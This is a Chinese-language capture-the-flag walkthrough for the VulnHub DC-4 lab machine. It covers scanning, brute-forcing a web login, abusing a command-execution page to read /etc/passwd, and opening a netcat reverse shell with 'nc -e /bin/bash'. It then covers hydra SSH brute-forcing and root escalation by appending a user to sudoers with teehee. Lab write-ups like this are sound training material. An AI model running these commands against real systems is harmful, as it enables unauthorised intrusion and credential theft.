前提:
请记住,VulnHub 是一个免费的社区资源,因此我们无法检查提供给我们的机器。在下载之前,请阅读我们的常见问题解答部分,其中涉及运行未知虚拟机的危险以及我们关于“保护您自己和您的网络”的建议。如果您了解风险,请下载!
靶机官网下载地址:http://www.five86.com/downloads/DC-4.zip
靶机介绍:
- 格式:虚拟机 (Virtualbox - OVA)
- 操作系统: Linux
- DHCP 服务:已启用
- IP 地址:自动分配
使用 arp-scan -l 发现存活的靶机
使用 nmap -T4 -A -v -p- 172.16.1.48 扫描靶机,发现靶机主要开放22和80端口
访问靶机80 端口,使用burp 默认字典爆破,成功爆破出密码happy进行登录
点击 Command 发现可以执行命令
进行burp 抓包,查看/etc/passwd 文件,看看有没有其他的用户
发现有三个用户可以进行登录
准备建立shell
在 burp 执行 nc -e /bin/bash 172.16.1.48 4444
在 kali 执行 nc -lvnp 4444
先使用 kali 进行监听,然后使用 burp 执行命令获得 shell
cd 到 /home/jim 目录下,发现sh文件
再cd 到 backups 目录下,发现一个旧密码文件,复制下来
使用 hydra 进行爆破,用户就是上面三个用户,密码就是复制下来的
使用ssh 连接进去,进入 /var/mail 目录,打开文件拿到 charles用户密码
切换到 charles 用户
接下来进行提权,使用 teehee 查看帮助,感觉像把内容追加到文件中
提权
利用 teehee 将 charles 加入到 sudoers 中,成功拿到flag
成功拿到 root 权限